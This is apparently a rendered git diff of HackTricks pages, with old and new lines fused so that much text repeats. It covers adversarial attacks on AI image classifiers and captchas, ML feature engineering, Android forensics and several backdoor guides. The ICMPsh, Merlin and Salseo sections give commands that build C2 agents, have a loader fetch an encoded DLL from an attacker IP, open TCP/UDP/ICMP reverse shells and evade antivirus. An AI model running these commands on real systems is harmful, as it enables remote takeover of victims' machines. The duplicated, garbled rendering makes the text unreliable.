It's reccomended to see at least the explanation in the [**introduction challenge colab Notebook**](//https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR) To go deeper on the BIM topic:
https://arxiv.org/pdf/1607.02533.pdf
To go deeper on the BIM topic:
https://arxiv.org/pdf/1607.02533.pdf As usual we will provide only the A.I. attack core part, it's up to you to complete the tool and blending it with PT techniques, depending on the situations.
As usual we will provide only the A.I. attack core part, it's up to you to complete the tool and blending it with PT techniques, depending on the situations. Please Note:
Please Note:
Remeber, in those kind of scenarios, in order to mime real-based attack applications, we don't have the exact model to fool or the image target in which we would like to transform our image. That's why, in order to overcome this issue, we must blend our core script, with a bruteforcer logic, accordingly to the application responses we want to fool. Remeber, in those kind of scenarios, in order to mime real-based attack applications, we don't have the exact model to fool or the image target in which we would like to transform our image. That's why, in order to overcome this issue, we must blend our core script, with a bruteforcer logic, accordingly to the application responses we want to fool.
<details> <details>

View file

@ -1,40 +1,38 @@
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>
#INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS (Part 1)
#A.I. HYBRID MALWARE CLASSIFIER
##INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS (Part 1) In this series of notebook we are going to build an **hybrid malware classifier.**
In this series of notebook we are going to build an **hybrid malware classifier.** For the **First part** we will focus on the scripting that involves dynamic analysis. Any steps of this series will come useful in order to detect malwares, and in this piece we will try to classify them based on their behaviour, utilizing the logs produced by running a program.
For the **First part** we will focus on the scripting that involves dynamic analysis. Any steps of this series will come useful in order to detect malwares, and in this piece we will try to classify them based on their behaviour, utilizing the logs produced by running a program. In the **Second Part** we will see how to manipulate the logs files in order to add robustness to our classifier and adjust the code to counter the more advanced methods of A.I. Malware Evasion.
In the **Second Part** we will see how to manipulate the logs files in order to add robustness to our classifier and adjust the code to counter the more advanced methods of A.I. Malware Evasion. In the **Third Part** we will create a Static Malware Classifier.
In the **Third Part** we will create a Static Malware Classifier. For the **Fourth Part** For the Fourth Part we will add some tactics to add robustness to our Static classifier and merge the latter with our Dynamic Classifier.
For the **Fourth Part** For the Fourth Part we will add some tactics to add robustness to our Static classifier and merge the latter with our Dynamic Classifier. **PLEASE NOTE:** This Series strongly relies on building a dataset on your own, even if it's not mandatory.<br>
There are also many available datasets for Static and/ or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but i strongly encourage that you build one or your own.
**PLEASE NOTE:** This Series strongly relies on building a dataset on your own, even if it's not mandatory.<br>
There are also many available datasets for Static and/ or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but i strongly encourage that you build one or your own. Here's the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn) enjoy and stay safe :)
Here's the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn) enjoy and stay safe :)
<details> <details>

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# BRA.I.NSMASHER Presentation # Presentation
## Presentation
**BrainSmasher** is a platform made with the purpose of aiding **pentesters, researcher, students, A.I. Cybersecurity engineers** to practice and learn all the techniques for **exploiting commercial A.I.** applications, by working on specifically crafted labs that reproduce several systems, like face recognition, speech recognition, ensemble image classification, autonomous drive, malware evasion, chatbot, data poisoning etc... **BrainSmasher** is a platform made with the purpose of aiding **pentesters, researcher, students, A.I. Cybersecurity engineers** to practice and learn all the techniques for **exploiting commercial A.I.** applications, by working on specifically crafted labs that reproduce several systems, like face recognition, speech recognition, ensemble image classification, autonomous drive, malware evasion, chatbot, data poisoning etc...
@ -39,7 +37,7 @@ _A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_
> _Walter Miele from BrA.I.nsmasher_ > _Walter Miele from BrA.I.nsmasher_
## Registry Challenge # Registry Challenge
In order to register in [**BrA.I.Smasher** ](https://beta.brainsmasher.eu)you need to solve an easy challenge ([**here**](https://beta.brainsmasher.eu/registrationChallenge)).\ In order to register in [**BrA.I.Smasher** ](https://beta.brainsmasher.eu)you need to solve an easy challenge ([**here**](https://beta.brainsmasher.eu/registrationChallenge)).\
Just think how you can confuse a neuronal network while not confusing the other one knowing that one detects better the panda while the other one is worse... Just think how you can confuse a neuronal network while not confusing the other one knowing that one detects better the panda while the other one is worse...
@ -50,7 +48,7 @@ However, if at some point you **don't know how to solve** the challenge, or **ev
I have to tell you that there are **easier ways** to pass the challenge, but this **solution** is **awesome** as you will learn how to pass the challenge performing an **Adversarial Image performing a Fast Gradient Signed Method (FGSM) attack for images.** I have to tell you that there are **easier ways** to pass the challenge, but this **solution** is **awesome** as you will learn how to pass the challenge performing an **Adversarial Image performing a Fast Gradient Signed Method (FGSM) attack for images.**
## More Tutorials # More Tutorials
{% content-ref url="basic-captcha-breaker.md" %} {% content-ref url="basic-captcha-breaker.md" %}
[basic-captcha-breaker.md](basic-captcha-breaker.md) [basic-captcha-breaker.md](basic-captcha-breaker.md)

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Basic Bruteforcer # BRUTEFORCER IMAGE CORRUPTION SCRIPT
## BRUTEFORCER IMAGE CORRUPTION SCRIPT
The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy to follow scripts, which represents the core for writing useful tools.\<br>\ The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy to follow scripts, which represents the core for writing useful tools.\<br>\
In this example (which can be used to solve the easy labs of BrainSmasher) by recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way, in order to iteratively produce some corrupted images, to bruteforce the face recon easy labs (and thus also real applications that relies on the same principles) In this example (which can be used to solve the easy labs of BrainSmasher) by recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way, in order to iteratively produce some corrupted images, to bruteforce the face recon easy labs (and thus also real applications that relies on the same principles)

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Basic Captcha Breaker
In this tutorial **a basic captcha is going to be broken**. In this tutorial **a basic captcha is going to be broken**.
A **NN is going to be trained** using several **images** that represents **letters** and then this NN is going to be used to **automatically identify the letters inside a captcha image**. A **NN is going to be trained** using several **images** that represents **letters** and then this NN is going to be used to **automatically identify the letters inside a captcha image**.

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# BIM Bruteforcer # BRUTEFORCER CORE SCRIPT WITH BIM ATTACK
## BRUTEFORCER CORE SCRIPT WITH BIM ATTACK
This time we introduce a new type of gradient based attack, in order to brute force an image classification app \(can be shaped and used for any input of course\), the BIM, or Basic Iteration Method. This time we introduce a new type of gradient based attack, in order to brute force an image classification app \(can be shaped and used for any input of course\), the BIM, or Basic Iteration Method.

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Hybrid Malware Classifier Part 1 # A.I. HYBRID MALWARE CLASSIFIER
## A.I. HYBRID MALWARE CLASSIFIER ## INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS \(Part 1\)
### INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS \(Part 1\)
In this series of notebook we are going to build an **hybrid malware classifier.** In this series of notebook we are going to build an **hybrid malware classifier.**

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# ML Basics
<details> <details>

View file

@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Feature Engineering # Basic types of possible data
## Basic types of possible data
Data can be **continuous** (**infinity** values) or **categorical** (nominal) where the amount of possible values are **limited**. Data can be **continuous** (**infinity** values) or **categorical** (nominal) where the amount of possible values are **limited**.
### Categorical types ## Categorical types
#### Binary ### Binary
Just **2 possible values**: 1 or 0. In case in a dataset the values are in string format (e.g. "True" and "False") you assign numbers to those values with: Just **2 possible values**: 1 or 0. In case in a dataset the values are in string format (e.g. "True" and "False") you assign numbers to those values with:
@ -33,7 +31,7 @@ Just **2 possible values**: 1 or 0. In case in a dataset the values are in strin
dataset["column2"] = dataset.column2.map({"T": 1, "F": 0}) dataset["column2"] = dataset.column2.map({"T": 1, "F": 0})
``` ```
#### **Ordinal** ### **Ordinal**
The **values follows an order**, like in: 1st place, 2nd place... If the categories are strings (like: "starter", "amateur", "professional", "expert") you can map them to numbers as we saw in the binary case. The **values follows an order**, like in: 1st place, 2nd place... If the categories are strings (like: "starter", "amateur", "professional", "expert") you can map them to numbers as we saw in the binary case.
@ -52,7 +50,7 @@ possible_values_mapping = {value:idx for idx,value in enumerate(possible_values_
dataset['column2'] = dataset.column2.map(possible_values_mapping) dataset['column2'] = dataset.column2.map(possible_values_mapping)
``` ```
#### **Cyclical** ### **Cyclical**
Looks **like ordinal value** because there is an order, but it doesn't mean one is bigger than the other. Also the **distance between them depends on the direction** you are counting. Example: The days of the week, Sunday isn't "bigger" than Monday. Looks **like ordinal value** because there is an order, but it doesn't mean one is bigger than the other. Also the **distance between them depends on the direction** you are counting. Example: The days of the week, Sunday isn't "bigger" than Monday.
@ -63,7 +61,7 @@ column2_dummies = pd.get_dummies(dataset.column2, drop_first=True)
dataset_joined = pd.concat([dataset[['column2']], column2_dummies], axis=1) dataset_joined = pd.concat([dataset[['column2']], column2_dummies], axis=1)
``` ```
#### **Dates** ### **Dates**
Date are **continuous** **variables**. Can be seen as **cyclical** (because they repeat) **or** as **ordinal** variables (because a time is bigger than a previous one). Date are **continuous** **variables**. Can be seen as **cyclical** (because they repeat) **or** as **ordinal** variables (because a time is bigger than a previous one).
@ -91,13 +89,13 @@ df_filled = daily_sum.reindex(idx, fill_value=0) # Fill missing values
# Get day of the week, Monday=0, Sunday=6, and week days names # Get day of the week, Monday=0, Sunday=6, and week days names
dataset['DoW'] = dataset.transaction_date.dt.dayofweek dataset['DoW'] = dataset.transaction_date.dt.dayofweek
## do the same in a different way # do the same in a different way
dataset['weekday'] = dataset.transaction_date.dt.weekday dataset['weekday'] = dataset.transaction_date.dt.weekday
# get day names # get day names
dataset['day_name'] = dataset.transaction_date.apply(lambda x: x.day_name()) dataset['day_name'] = dataset.transaction_date.apply(lambda x: x.day_name())
``` ```
#### Multi-category/nominal ### Multi-category/nominal
**More than 2 categories** with no related order. Use `dataset.describe(include='all')` to get information about the categories of each feature. **More than 2 categories** with no related order. Use `dataset.describe(include='all')` to get information about the categories of each feature.
@ -110,7 +108,7 @@ You can get a **multi-category column one-hot encoded** with `pd.get_dummies(dat
You can get a **multi-category column dummie encoded** with `pd.get_dummies(dataset.column1, drop_first=True)`. This will transform all the classes in binary features, so this will create **one new column per possible class minus one** as the **last 2 columns will be reflect as "1" or "0" in the last binary column created**. This will avoid perfect multicollinearity, reducing the relations between columns. You can get a **multi-category column dummie encoded** with `pd.get_dummies(dataset.column1, drop_first=True)`. This will transform all the classes in binary features, so this will create **one new column per possible class minus one** as the **last 2 columns will be reflect as "1" or "0" in the last binary column created**. This will avoid perfect multicollinearity, reducing the relations between columns.
## Collinear/Multicollinearity # Collinear/Multicollinearity
Collinear appears when **2 features are related to each other**. Multicollineratity appears when those are more than 2. Collinear appears when **2 features are related to each other**. Multicollineratity appears when those are more than 2.
@ -128,7 +126,7 @@ X = add_constant(onehot_encoded) # Add previously one-hot encoded data
print(pd.Series([variance_inflation_factor(X.values,i) for i in range(X.shape[1])], index=X.columns)) print(pd.Series([variance_inflation_factor(X.values,i) for i in range(X.shape[1])], index=X.columns))
``` ```
## Categorical Imbalance # Categorical Imbalance
This occurs when there is **not the same amount of each category** in the training data. This occurs when there is **not the same amount of each category** in the training data.
@ -177,7 +175,7 @@ You can use the argument **`sampling_strategy`** to indicate the **percentage**
Undersamplig or Oversampling aren't perfect if you get statistics (with `.describe()`) of the over/under-sampled data and compare them to the original you will see **that they changed.** Therefore oversampling and undersampling are modifying the training data. Undersamplig or Oversampling aren't perfect if you get statistics (with `.describe()`) of the over/under-sampled data and compare them to the original you will see **that they changed.** Therefore oversampling and undersampling are modifying the training data.
{% endhint %} {% endhint %}
### SMOTE oversampling ## SMOTE oversampling
**SMOTE** is usually a **more trustable way to oversample the data**. **SMOTE** is usually a **more trustable way to oversample the data**.
@ -192,13 +190,13 @@ dataset['target_column'] = y_smote
print(y_smote.value_counts()) #Confirm data isn't imbalanced anymore print(y_smote.value_counts()) #Confirm data isn't imbalanced anymore
``` ```
## Rarely Occurring Categories # Rarely Occurring Categories
Imagine a dataset where one of the target classes **occur very little times**. Imagine a dataset where one of the target classes **occur very little times**.
This is like the category imbalance from the previous section, but the rarely occurring category is occurring even less than "minority class" in that case. The **raw** **oversampling** and **undersampling** methods could be also used here, but generally those techniques **won't give really good results**. This is like the category imbalance from the previous section, but the rarely occurring category is occurring even less than "minority class" in that case. The **raw** **oversampling** and **undersampling** methods could be also used here, but generally those techniques **won't give really good results**.
### Weights ## Weights
In some algorithms it's possible to **modify the weights of the targeted data** so some of them get by default more importance when generating the model. In some algorithms it's possible to **modify the weights of the targeted data** so some of them get by default more importance when generating the model.
@ -209,13 +207,13 @@ model = LogisticRegression(class_weight=weights)
You can **mix the weights with over/under-sampling techniques** to try to improve the results. You can **mix the weights with over/under-sampling techniques** to try to improve the results.
### PCA - Principal Component Analysis ## PCA - Principal Component Analysis
Is a method that helps to reduce the dimensionality of the data. It's going to **combine different features** to **reduce the amount** of them generating **more useful features** (_less computation is needed_). Is a method that helps to reduce the dimensionality of the data. It's going to **combine different features** to **reduce the amount** of them generating **more useful features** (_less computation is needed_).
The resulting features aren't understandable by humans, so it also **anonymize the data**. The resulting features aren't understandable by humans, so it also **anonymize the data**.
## Incongruent Label Categories # Incongruent Label Categories
Data might have mistakes for unsuccessful transformations or just because human error when writing the data. Data might have mistakes for unsuccessful transformations or just because human error when writing the data.
@ -225,7 +223,7 @@ You can clean this issues by lowercasing everything and mapping misspelled label
It's very important to check that **all the data that you have contains is correctly labeled**, because for example, one misspelling error in the data, when dummie encoding the classes, will generate a new column in the final features with **bad consequences for the final model**. This example can be detected very easily by one-hot encoding a column and checking the names of the columns created. It's very important to check that **all the data that you have contains is correctly labeled**, because for example, one misspelling error in the data, when dummie encoding the classes, will generate a new column in the final features with **bad consequences for the final model**. This example can be detected very easily by one-hot encoding a column and checking the names of the columns created.
## Missing Data # Missing Data
Some data of the study may be missing. Some data of the study may be missing.
@ -293,7 +291,7 @@ dataset.iloc[10:20] # Get some indexes that contained empty data before
To fill categorical data first of all you need to think if there is any reason why the values are missing. If it's by **choice of the users** (they didn't want to give the data) maybe yo can **create a new category** indicating that. If it's because of human error you can **remove the rows** or the **feature** (check the steps mentioned before) or **fill it with the mode, the most used category** (not recommended). To fill categorical data first of all you need to think if there is any reason why the values are missing. If it's by **choice of the users** (they didn't want to give the data) maybe yo can **create a new category** indicating that. If it's because of human error you can **remove the rows** or the **feature** (check the steps mentioned before) or **fill it with the mode, the most used category** (not recommended).
## Combining Features # Combining Features
If you find **two features** that are **correlated** between them, usually you should **drop** one of them (the one that is less correlated with the target), but you could also try to **combine them and create a new feature**. If you find **two features** that are **correlated** between them, usually you should **drop** one of them (the one that is less correlated with the target), but you could also try to **combine them and create a new feature**.

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# About the author ## Hello!!
### Hello!!
This is **Carlos Polop**. This is **Carlos Polop**.
@ -27,7 +25,7 @@ First of all, I want to indicate that **I don't own this entire book**, a lot of
I also wants to say **thanks to all the people that share cyber-security related information for free** on the Internet. Thanks to them I learn new hacking techniques that then I add to Hacktricks. I also wants to say **thanks to all the people that share cyber-security related information for free** on the Internet. Thanks to them I learn new hacking techniques that then I add to Hacktricks.
### BIO ## BIO
* I've worked in different companies as sysadmin, developer and **pentester** * I've worked in different companies as sysadmin, developer and **pentester**
* I'm a **Telecommunications Engineer** with a **Masters** in **Cybersecurity** * I'm a **Telecommunications Engineer** with a **Masters** in **Cybersecurity**
@ -37,7 +35,7 @@ I also wants to say **thanks to all the people that share cyber-security related
* I'm also the developer of [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng) * I'm also the developer of [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng)
* And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking** * And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking**
### Support HackTricks ## Support HackTricks
Thank you for be **reading this**! Thank you for be **reading this**!

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Android Forensics # Locked Device
## Locked Device
To start extracting data from an Android device it has to be unlocked. If it's locked you can: To start extracting data from an Android device it has to be unlocked. If it's locked you can:
@ -27,17 +25,17 @@ To start extracting data from an Android device it has to be unlocked. If it's l
* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) * Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf)
* Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) * Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
## Data Adquisition # Data Adquisition
Create an [android backup using adb](mobile-apps-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` Create an [android backup using adb](mobile-apps-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar`
### If root access or physical connection to JTAG interface ## If root access or physical connection to JTAG interface
* `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory). * `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory).
* `df /data` (Discover the block size of the system). * `df /data` (Discover the block size of the system).
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (execute it with the information gathered from the block size). * dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (execute it with the information gathered from the block size).
### Memory ## Memory
Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel extension that should be loaded via adb. Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel extension that should be loaded via adb.

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Empire
<details> <details>

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# ICMPsh
Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
## Client side # Client side
Execute the script: **run.sh** Execute the script: **run.sh**
@ -39,7 +37,7 @@ echo Please insert the IP where you want to listen
read IP read IP
``` ```
## **Victim Side** # **Victim Side**
Upload **icmpsh.exe** to the victim and execute: Upload **icmpsh.exe** to the victim and execute:

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Merlin # Installation
## Installation ## Install GO
### Install GO
``` ```
#Download GO package from: https://golang.org/dl/ #Download GO package from: https://golang.org/dl/
@ -36,24 +34,24 @@ Add "export GOBIN=$GOPATH/bin"
source /etc/profile source /etc/profile
``` ```
### Install Merlin ## Install Merlin
``` ```
go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch
cd $GOPATH/src/github.com/Ne0nd0g/merlin/ cd $GOPATH/src/github.com/Ne0nd0g/merlin/
``` ```
## Launch Merlin Server # Launch Merlin Server
``` ```
go run cmd/merlinserver/main.go -i go run cmd/merlinserver/main.go -i
``` ```
## Merlin Agents # Merlin Agents
You can [download precompiled agents](https://github.com/Ne0nd0g/merlin/releases) You can [download precompiled agents](https://github.com/Ne0nd0g/merlin/releases)
### Compile Agents ## Compile Agents
Go to the main folder _$GOPATH/src/github.com/Ne0nd0g/merlin/_ Go to the main folder _$GOPATH/src/github.com/Ne0nd0g/merlin/_
@ -64,13 +62,13 @@ make windows #Server and Agents for Windows
make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips) make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)
``` ```
### **Manual compile agents** ## **Manual compile agents**
``` ```
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g
``` ```
## Modules # Modules
**The bad news is that every module used by Merlin is downloaded from the source (github) and saved indisk before using it. Forge about usingwell known modules because Windows Defender will catch you!**\ **The bad news is that every module used by Merlin is downloaded from the source (github) and saved indisk before using it. Forge about usingwell known modules because Windows Defender will catch you!**\
@ -103,7 +101,7 @@ GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -
**Didn't check persistence modules** **Didn't check persistence modules**
## Resume # Resume
I really like the feeling and the potential of the tool.\ I really like the feeling and the potential of the tool.\
I hope the tool will start downloading the modules from the server and integrates some kind of evasion when downloading scripts. I hope the tool will start downloading the modules from the server and integrates some kind of evasion when downloading scripts.

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Salseo # Compiling the binaries
## Compiling the binaries
Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code. Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.
@ -35,18 +33,18 @@ Then, build both projects (Build -> Build Solution) (Inside the logs will appear
![](<../.gitbook/assets/image (1).png>) ![](<../.gitbook/assets/image (1).png>)
## Prepare the Backdoor # Prepare the Backdoor
First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly** First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**
### **Python** ## **Python**
``` ```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE> python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
``` ```
### Windows ## Windows
``` ```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE> EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
@ -57,9 +55,9 @@ Ok, now you have everything you need to execute all the Salseo thing: the **enco
**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...** **Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
## **Execute the backdoor** # **Execute the backdoor**
### **Getting a TCP reverse shell (downloading encoded dll through HTTP)** ## **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa. Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa.
@ -67,7 +65,7 @@ Remember to start a nc as the reverse shell listener, and a HTTP server to serve
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port> SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
``` ```
### **Getting a UDP reverse shell (downloading encoded dll through SMB)** ## **Getting a UDP reverse shell (downloading encoded dll through SMB)**
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver). Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
@ -75,11 +73,11 @@ Remember to start a nc as the reverse shell listener, and a SMB server to serve
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port> SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
``` ```
### **Getting a ICMP reverse shell (encoded dll already inside the victim)** ## **Getting a ICMP reverse shell (encoded dll already inside the victim)**
**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) **This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
#### **Disable ICMP Replies:** ### **Disable ICMP Replies:**
``` ```
sysctl -w net.ipv4.icmp_echo_ignore_all=1 sysctl -w net.ipv4.icmp_echo_ignore_all=1
@ -88,45 +86,45 @@ sysctl -w net.ipv4.icmp_echo_ignore_all=1
sysctl -w net.ipv4.icmp_echo_ignore_all=0 sysctl -w net.ipv4.icmp_echo_ignore_all=0
``` ```
#### Execute the client: ### Execute the client:
``` ```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>" python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
``` ```
#### Inside the victim, lets execute the salseo thing: ### Inside the victim, lets execute the salseo thing:
``` ```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP> SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
``` ```
## Compiling SalseoLoader as DLL exporting main function # Compiling SalseoLoader as DLL exporting main function
Open the SalseoLoader project using Visual Studio. Open the SalseoLoader project using Visual Studio.
### Add before the main function: \[DllExport] ## Add before the main function: \[DllExport]
![](<../.gitbook/assets/image (2).png>) ![](<../.gitbook/assets/image (2).png>)
### Install DllExport for this project ## Install DllExport for this project
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...** ### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
![](<../.gitbook/assets/image (3).png>) ![](<../.gitbook/assets/image (3).png>)
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)** ### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
![](<../.gitbook/assets/image (4).png>) ![](<../.gitbook/assets/image (4).png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat** In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
### **U**ninstall DllExport ## **U**ninstall DllExport
Press **Uninstall** (yeah, its weird but trust me, it is necessary) Press **Uninstall** (yeah, its weird but trust me, it is necessary)
![](<../.gitbook/assets/image (5).png>) ![](<../.gitbook/assets/image (5).png>)
### **Exit Visual Studio and execute DllExport\_configure** ## **Exit Visual Studio and execute DllExport\_configure**
Just **exit** Visual Studio Just **exit** Visual Studio
@ -136,13 +134,13 @@ Select **x64** (if you are going to use it inside a x64 box, that was my case),
![](<../.gitbook/assets/image (7).png>) ![](<../.gitbook/assets/image (7).png>)
### **Open the project again with visual Studio** ## **Open the project again with visual Studio**
**\[DllExport]** should not be longer marked as error **\[DllExport]** should not be longer marked as error
![](<../.gitbook/assets/image (8).png>) ![](<../.gitbook/assets/image (8).png>)
### Build the solution ## Build the solution
